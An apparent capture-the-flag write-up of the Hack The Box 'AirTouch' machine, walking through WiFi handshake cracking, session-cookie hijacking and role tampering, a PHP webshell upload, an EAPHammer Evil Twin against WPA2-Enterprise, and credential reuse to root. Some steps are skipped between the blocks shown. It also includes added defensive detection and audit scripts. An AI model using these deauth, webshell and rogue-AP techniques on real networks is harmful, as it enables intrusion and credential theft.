AirTouch is a medium-difficulty machine from Hack The Box that simulates a multi-AP corporate WiFi environment. We start by leaking the consultant’s SSH password through an open SNMP service, land on a jump host equipped with multiple wireless interfaces, and capture a WPA2-PSK handshake from the AirTouch-Internet network. After cracking the PSK, we associate to the network, sniff decrypted HTTP traffic from the router admin panel, and hijack a session cookie. Tampering with the UserRole cookie grants us admin access, where we abuse a file upload to drop a webshell and read credentials reused for SSH on the PSK access point. From there, we pivot to the WPA2-Enterprise AirTouch-Office network using EAPHammer to run an Evil Twin attack against 802.1X, capture an MSCHAPv2 challenge/response, crack it offline, and chain through two more access points to root.
```
$ nmap -A -Pn 10.129.10.86
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-19 23:05 EST
Nmap scan report for 10.129.10.86
Host is up (0.35s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 bd:90:00:15:cf:4b:da:cb:c9:24:05:2b:01:ac:dc:3b (RSA)
|   256 6e:e2:44:70:3c:6b:00:57:16:66:2f:37:58:be:f5:c0 (ECDSA)
|_  256 ad:d5:d5:f0:0b:af:b2:11:67:5b:07:5c:8e:85:76:76 (ED25519)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8888/tcp)
HOP RTT       ADDRESS
1   494.15 ms 10.10.16.1
2   225.16 ms 10.129.10.86
```
Only SSH on port 22 is exposed via TCP. With nothing else to chew on, we move to UDP enumeration and try SNMP with the default public community string.
```
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

consultant@AirTouch-Consultant:~$ ls
diagram-net.png  photo_2023-03-01_22-04-52.png
consultant@AirTouch-Consultant:~$
```
The home directory contains two images. Let’s pull them down for inspection.
The diagram shows the network topology — a consultant box with multiple wireless adapters, an internal AirTouch-Internet PSK access point, an AirTouch-Office enterprise access point, and a photo hinting at the SSIDs we should attack. With wireless interfaces on the host, this is clearly going to be a wireless-pentest box.
Wireless Recon - AirTouch-Internet
We escalate to root (the consultant box has unrestricted sudo) so we can manipulate the wireless interfaces and run airodump-ng to discover nearby APs.
```
consultant@AirTouch-Consultant:~$ sudo -i
root@AirTouch-Consultant:~# aireplay-ng --deauth 10 -a F0:9F:C2:A3:F1:A7 wlan0
05:20:09  Waiting for beacon frame (BSSID: F0:9F:C2:A3:F1:A7) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
```
```
root@AirTouch-Consultant:~# nmap -A -Pn 192.168.3.1
Starting Nmap 7.80 ( https://nmap.org ) at 2026-01-20 05:28 UTC
Nmap scan report for 192.168.3.1
Host is up (0.00020s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  dnsmasq 2.90
| dns-nsid: 
|_  bind.version: dnsmasq-2.90
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: WiFi Router Configuration
|_Requested resource was login.php
MAC Address: F0:9F:C2:A3:F1:A7 (Ubiquiti Networks)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=1/20%OT=22%CT=1%CU=38638%PV=Y%DS=1%DC=D%G=Y%M=F09FC2%T
OS:M=696F129C%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.20 ms 192.168.3.1
```
The router exposes a WiFi Router Configuration web app on /login.php. Browsing to it gives us the login page.
![[Pasted image 20260120083110.png]]
We don’t have credentials yet — but we do have the ability to sniff the wireless segment. Since we know the PSK, every frame we capture can be decrypted by Wireshark. Let’s grab a fresh capture with active client traffic in it.
Sniffing Decrypted Traffic
We start a new capture on wlan1 (in monitor mode) and trigger another deauth so the legitimate client reconnects and starts talking to the router again.
```html
Congratulation! You have logged into password protected page. <a href="index.php">Click here</a> to go to index.php to get the flag.
</body>
</html>
```
We now have a valid session cookie (PHPSESSID=ctf72095cfdr7iu3ru2blg59jq) and a hint that authorization is decided by the client-controlled UserRole cookie. We replay the cookie in our browser:
![[Pasted image 20260120095627.png]]
Cookie Tampering - Privilege Bypass
We swap UserRole=user to UserRole=admin with Burp:
![[Pasted image 20260120100338.png]]
PHPSESSID=ctf72095cfdr7iu3ru2blg59jq; UserRole=admin lands us on the admin dashboard, which exposes a file upload feature. We bypass the extension filter by uploading <?php system($_GET["cmd"]);?> saved as .phtml and execute commands.
The relevant part of the login handler shows why this works: the role is handed to the client as a cookie at login instead of being kept in the server-side session.

```php
// Check if user is already logged in
if (isset($_SESSION['UserData']['Username'])) {
    header("Location:index.php"); // Redirect to index.php
    exit; // Make sure to exit after redirection
}

/* Check and assign submitted Username and Password to new variable */
$Username = isset($_POST['Username']) ? $_POST['Username'] : '';
$Password = isset($_POST['Password']) ? $_POST['Password'] : '';

/* Check Username and Password existence in defined array */
if (isset($logins[$Username]) && $logins[$Username]['password'] === $Password) {
    /* Success: Set session variables and redirect to Protected page */
    $_SESSION['UserData']['Username'] = $logins[$Username]['password'];
    /* Success: Set session variables USERNAME */
    $_SESSION['Username'] = $Username;

    // Set a cookie with the user's role
    setcookie('UserRole', $logins[$Username]['role'], time() + (86400 * 30), "/"); // 86400 = 1 day
```
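From the defender's side, both steps of this (the replayed PHPSESSID and the UserRole flip) are visible in the router's web logs if the Cookie header is logged. The following is an added example, not code from the writeup or the box; it assumes Apache is configured with a custom LogFormat that records `%{Cookie}i` (the default combined format does not), and the log lines are constructed.

```python
import re
from collections import defaultdict

# Constructed sample lines. Assumed LogFormat (not the router's real config):
#   LogFormat "%h %t \"%r\" %>s \"%{Cookie}i\""   -- the Cookie header is logged
SAMPLE_LOG = """\
192.168.3.23 [20/Jan/2026:09:41:02 +0000] "GET /index.php HTTP/1.1" 200 "PHPSESSID=ctf72095cfdr7iu3ru2blg59jq; UserRole=user"
192.168.3.23 [20/Jan/2026:09:41:09 +0000] "GET /status.php HTTP/1.1" 200 "PHPSESSID=ctf72095cfdr7iu3ru2blg59jq; UserRole=user"
192.168.3.61 [20/Jan/2026:09:56:27 +0000] "GET /index.php HTTP/1.1" 200 "PHPSESSID=ctf72095cfdr7iu3ru2blg59jq; UserRole=user"
192.168.3.61 [20/Jan/2026:10:03:38 +0000] "GET /index.php HTTP/1.1" 200 "PHPSESSID=ctf72095cfdr7iu3ru2blg59jq; UserRole=admin"
192.168.3.40 [20/Jan/2026:10:05:00 +0000] "GET /index.php HTTP/1.1" 200 "PHPSESSID=constructedsessionid000000; UserRole=user"
"""

LINE_RE = re.compile(r'^(\S+) \[([^\]]+)\] "([^"]*)" (\d{3}) "([^"]*)"$')

def parse_cookies(header):
    """Split a Cookie header into a dict; fragments without '=' are ignored."""
    out = {}
    for part in header.split(";"):
        if "=" in part:
            k, v = part.strip().split("=", 1)
            out[k] = v
    return out

def detect(log_text):
    """Return (session_id, reason) findings: one session presented from several
    client IPs (cookie replay), or its UserRole cookie moving to 'admin'."""
    ips = defaultdict(set)
    roles = defaultdict(list)  # distinct UserRole values per session, in order seen
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, _ts, _req, _status, cookie_hdr = m.groups()
        cookies = parse_cookies(cookie_hdr)
        sid = cookies.get("PHPSESSID")
        if not sid:
            continue
        ips[sid].add(ip)
        role = cookies.get("UserRole")
        if role is not None and role not in roles[sid]:
            roles[sid].append(role)
    findings = []
    for sid, seen in ips.items():
        if len(seen) > 1:
            findings.append((sid, "session presented from %d client IPs: %s"
                             % (len(seen), ", ".join(sorted(seen)))))
        if "admin" in roles[sid] and roles[sid][0] != "admin":
            findings.append((sid, "UserRole changed %s -> admin within the same session"
                             % roles[sid][0]))
    return findings
```

Detection is the fallback; the root cause is that the role lives in a client-controlled cookie, and the fix is to keep it in the server-side session and never read it from the request.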
```
root@AirTouch-Consultant:~# ssh user@192.168.3.1
The authenticity of host '192.168.3.1 (192.168.3.1)' can't be established.
ECDSA key fingerprint is SHA256:++nw1pytCTTnPb2ngccd1CzlYaYUoTF8GmQ3a3QHnaU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.3.1' (ECDSA) to the list of known hosts.
user@192.168.3.1's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

user@AirTouch-AP-PSK:~$ ls
user@AirTouch-AP-PSK:~$ cd
user@AirTouch-AP-PSK:~$ ls
user@AirTouch-AP-PSK:~$ id
uid=1000(user) gid=1000(user) groups=1000(user)
user@AirTouch-AP-PSK:~$
```
We are now sitting on AirTouch-AP-PSK, the PSK access point itself.
Privilege Escalation - PSK AP
sudo -l shows we can run anything with no password. Easy.
```
user@AirTouch-AP-PSK:~$ sudo -l
Matching Defaults entries for user on AirTouch-AP-PSK:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user may run the following commands on AirTouch-AP-PSK:
    (ALL) NOPASSWD: ALL
user@AirTouch-AP-PSK:~$ sudo su
root@AirTouch-AP-PSK:/home/user# cd
root@AirTouch-AP-PSK:~# ls
certs-backup  cronAPs.sh  psk  send_certs.sh  start.sh  user.txt  wlan_config_aps
root@AirTouch-AP-PSK:~# cat user.txt
183ab4d95c2ca8c5864449e56c8d5261
root@AirTouch-AP-PSK:~#
```
user.txt is ours. While we’re here, let’s check what else lives on this AP — send_certs.sh looks juicy.
```
# Use sshpass to send the folder via SCP
sshpass -p "$REMOTE_PASSWORD" scp -r "$LOCAL_FOLDER" "remote@10.10.10.1:$REMOTE_PATH"
root@AirTouch-AP-PSK:~#
```
Hardcoded credentials for the office AP: remote : xGgWEwqUpfoOVsLeROeG, target 10.10.10.1. To reach that host, we need to be associated to the AirTouch-Office network — which is WPA2-Enterprise (802.1X). Time to escalate the wireless attack.
Targeting AirTouch-Office (WPA2-Enterprise)
The AirTouch-Office SSID uses WPA2-Enterprise (802.1X) instead of a single shared key. Authentication is delegated to a RADIUS server, so each user has their own credentials — typically validated via PEAP-MSCHAPv2.
The classic way to harvest credentials against PEAP is an Evil Twin / Rogue AP: we stand up a malicious access point with the same SSID and signal-shadow the legitimate one with deauth frames. When the victim client roams to our AP, it transparently completes a PEAP exchange with us — handing over a username and an MSCHAPv2 challenge/response that we can crack offline.
The consultant box already has the AirTouch CA / server cert / private key staged in the home directory. We import them into EAPHammer so our rogue AP presents a “trusted-looking” certificate.
```
Now with more fast travel than a next-gen Bethesda game. >:D

                     Version:  1.14.0
                     Codename: Final Frontier
                     Author:   @s0lst1c3
                     Contact:  gabriel<<at>>transmitengage.com

[?] Am I root?
[*] Checking for rootness...
[*] I AM ROOOOOOOOOOOOT
[*] Root privs confirmed! 8D
Case 1: Import all separate
[CW] Ensuring server cert, CA cert, and private key are valid...
server.crt server.key ca.crt
[CW] Complete!
[CW] Loading private key from server.key
[CW] Complete!
[CW] Loading server cert from server.crt
[CW] Complete!
[CW] Loading CA certificate chain from ca.crt
[CW] Complete!
[CW] Constructing full certificate chain with integrated key...
[CW] Complete!
[CW] Writing private key and full certificate chain to file...
[CW] Complete!
[CW] Private key and full certificate chain written to: /root/eaphammer/certs/server/AirTouch CA.pem
[CW] Activating full certificate chain...
[CW] Complete!
root@AirTouch-Consultant:~#
```
Listing the active certificate confirms the chain EAPHammer will present:

```
Now with more fast travel than a next-gen Bethesda game. >:D

                     Version:  1.14.0
                     Codename: Final Frontier
                     Author:   @s0lst1c3
                     Contact:  gabriel<<at>>transmitengage.com

[?] Am I root?
[*] Checking for rootness...
[*] I AM ROOOOOOOOOOOOT
[*] Root privs confirmed! 8D
/root/eaphammer/certs/server/AirTouch CA.pem

Subject:                               Issuer:
CN -> AirTouch CA                      CN -> AirTouch CA
C -> ES                                C -> ES
ST -> None                             ST -> Madrid
L -> Madrid                            L -> Madrid
OU -> Server                           OU -> Certificate Authority
emailAddress -> [email protected]        emailAddress -> [email protected]
```
Setting Up the Rogue Infrastructure
We dedicate wlan4 to the deauth flood and wlan3 to hosting the rogue AP, plus a small DHCP server so any client that associates gets an IP from us.
```
consultant@AirTouch-Consultant:~$ sudo iwconfig wlan4
wlan4     IEEE 802.11  Mode:Monitor  Frequency:5.22 GHz  Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
```
```
consultant@AirTouch-Consultant:~$ sudo ip addr add 192.168.99.1/24 dev wlan3
consultant@AirTouch-Consultant:~$ sudo dnsmasq --interface=wlan3 --dhcp-range=192.168.99.50,192.168.99.150,12h --dhcp-option=3,192.168.99.1 --dhcp-option=6,8.8.8.8 -d
```
We confirm the legitimate AirTouch-Office AP is up and on channel 44 (5 GHz).
We feed the captured challenge/response to john with rockyou:

```
$ john -w:/usr/share/wordlists/rockyou.txt ~/hash.txt
Warning: detected hash type "netntlm", but the string is also recognized as "netntlm-naive"
Use the "--format=netntlm-naive" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (netntlm, NTLMv1 C/R [MD4 DES (ESS MD5) 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
laboratory       (r4ulcl)
1g 0:00:00:00 DONE (2026-01-21 00:32) 25.00g/s 2318Kp/s 2318Kc/s 2318KC/s ragde..ivan23
Use the "--show --format=netntlm" options to display all of the cracked passwords reliably
Session completed.
```
r4ulcl : laboratory. Done.
Joining AirTouch-Office
We swap to a PEAP wpa_supplicant profile on wlan1 and DHCP into the office network.
```
root@AirTouch-Consultant:~# cat office.conf
network={
    ssid="AirTouch-Office"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="AirTouch\\r4ulcl"
    password="laboratory"
}
root@AirTouch-Consultant:~# wpa_supplicant -i wlan1 -c office.conf -B
Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
rfkill: Cannot get wiphy information
nl80211: Could not set interface 'p2p-dev-wlan1' UP
nl80211: deinit ifname=p2p-dev-wlan1 disabled_11b_rates=0
p2p-dev-wlan1: Failed to initialize driver interface
P2P: Failed to enable P2P Device interface
root@AirTouch-Consultant:~# dhclient wlan1
root@AirTouch-Consultant:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0@if29: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 92:03:9b:e4:f1:fe brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.20.1.2/24 brd 172.20.1.255 scope global eth0
       valid_lft forever preferred_lft forever
7: wlan0: <BROADCAST,ALLMULTI,PROMISC,NOTRAILERS,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 02:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff
    inet 192.168.3.61/24 brd 192.168.3.255 scope global dynamic wlan0
       valid_lft 86038sec preferred_lft 86038sec
    inet6 fe80::ff:fe00:0/64 scope link 
       valid_lft forever preferred_lft forever
8: wlan1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 02:00:00:00:01:00 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.98/24 brd 10.10.10.255 scope global dynamic wlan1
       valid_lft 863998sec preferred_lft 863998sec
    inet6 fe80::ff:fe00:100/64 scope link 
       valid_lft forever preferred_lft forever
9: wlan2: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:02:00 brd ff:ff:ff:ff:ff:ff
10: wlan3: <BROADCAST,MULTICAST> mtu 1500 qdisc mq state DOWN group default qlen 1000
    link/ether ac:8b:a9:aa:3f:d2 brd ff:ff:ff:ff:ff:ff
    inet 192.168.99.1/24 scope global wlan3
       valid_lft forever preferred_lft forever
11: wlan4: <BROADCAST,ALLMULTI,PROMISC,NOTRAILERS,UP,LOWER_UP> mtu 1500 qdisc mq state UNKNOWN group default qlen 1000
    link/ieee802.11/radiotap 02:00:00:00:04:00 brd ff:ff:ff:ff:ff:ff
12: wlan5: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:04:00 brd ff:ff:ff:ff:ff:ff
13: wlan6: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 02:00:00:00:06:00 brd ff:ff:ff:ff:ff:ff
```
wlan1 now has 10.10.10.98/24 — we are inside the office segment with the management AP at 10.10.10.1. Time to use the credentials we lifted from send_certs.sh.
```
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

remote@AirTouch-AP-MGT:~$ id
uid=1000(remote) gid=1000(remote) groups=1000(remote)
```
Privilege Escalation - Root
We rummage through /etc/hostapd since this is the management AP, and the RADIUS user database for the office network sits right there with an admin user and password.
```
remote@AirTouch-AP-MGT:/etc/hostapd$ cat * | grep -i admin
# text file that could be used, e.g., to populate the AP administration UI with
# administered bit)
"admin"   MSCHAPV2   "xMJpzXt4D9ouMuL3JJsMriF7KZozm7"   [2]
# text file that could be used, e.g., to populate the AP administration UI with
# administered bit)
remote@AirTouch-AP-MGT:/etc/hostapd$
```
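Two things went wrong on this AP: the hostapd EAP user file stores inner-method passwords in the clear, and an unprivileged account could read it. The following audit script is an added example, not part of the writeup or the box; it parses the hostapd.eap_user grammar (`identity METHOD[,METHOD] ["password" | hash:<NT hash>] [2]`), flags plaintext versus `hash:` entries, and checks whether the file is readable by anyone but its owner. The sample file content is constructed.

```python
import os
import re
import stat
import tempfile

# Constructed sample hostapd.eap_user content (not the file from the machine).
SAMPLE_EAP_USER = """\
*         PEAP,TTLS,TLS
# phase 2 (inner) users
"alice"   MSCHAPV2   "constructed-plaintext-pw"              [2]
"bob"     MSCHAPV2   hash:00112233445566778899aabbccddeeff   [2]
"carol"   TTLS-PAP   "another-constructed-pw"                [2]
"dave"    TLS
"""

# identity  METHOD[,METHOD...]  [ "password" | hash:<32 hex NT hash> ]  [ [2] ]
ENTRY_RE = re.compile(
    r'^(?:\*|"[^"]*")\s+([A-Za-z0-9,\-]+)'
    r'(?:\s+("[^"]*"|hash:[0-9a-fA-F]{32}))?(?:\s+\[2\])?\s*$')

def audit_entries(text):
    """Return (line_no, kind, methods) per secret-bearing line: kind is 'plaintext'
    (readable as-is), 'nthash' (hash: form, crackable but not reusable as-is) or 'unparsed'."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = ENTRY_RE.match(line)
        if not m:
            findings.append((n, "unparsed", line))
            continue
        methods, secret = m.groups()
        if secret is None:  # outer-method or certificate-only (TLS) line
            continue
        findings.append((n, "nthash" if secret.startswith("hash:") else "plaintext", methods))
    return findings

def readable_by_others(path):
    """True if group or world can read the file (expect mode 0600, owner root)."""
    return bool(os.stat(path).st_mode & (stat.S_IRGRP | stat.S_IROTH))

def demo(mode=0o644):
    """Write the constructed sample with the given mode, audit it, clean up."""
    fd, path = tempfile.mkstemp(suffix=".eap_user")
    with os.fdopen(fd, "w") as fh:
        fh.write(SAMPLE_EAP_USER)
    os.chmod(path, mode)
    try:
        entries = audit_entries(open(path).read())
        return {"plaintext": [e for e in entries if e[1] == "plaintext"],
                "nthash": [e for e in entries if e[1] == "nthash"],
                "readable_by_others": readable_by_others(path)}
    finally:
        os.unlink(path)
```

MSCHAPv2 needs the NT hash server-side, so `hash:` entries remain crackable offline if the file leaks; the permission check is the control that actually matters here.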
That same password works for the local admin account, and admin has unrestricted sudo.
```
remote@AirTouch-AP-MGT:/etc/hostapd$ su admin
Password: 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

admin@AirTouch-AP-MGT:/etc/hostapd$ id
uid=1001(admin) gid=1001(admin) groups=1001(admin)
admin@AirTouch-AP-MGT:/etc/hostapd$ sudo -l
Matching Defaults entries for admin on AirTouch-AP-MGT:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User admin may run the following commands on AirTouch-AP-MGT:
    (ALL) ALL
    (ALL) NOPASSWD: ALL
admin@AirTouch-AP-MGT:/etc/hostapd$ sudo su
root@AirTouch-AP-MGT:/etc/hostapd# cd
root@AirTouch-AP-MGT:~# ls
certs  mgt  root.txt  start.sh  wlan_config_aps
root@AirTouch-AP-MGT:~# cat root.txt
e651d01aebe45d11022a4e9733e3bd34
root@AirTouch-AP-MGT:~#
```
And we are root.
That was it for AirTouch, hope you learned something new!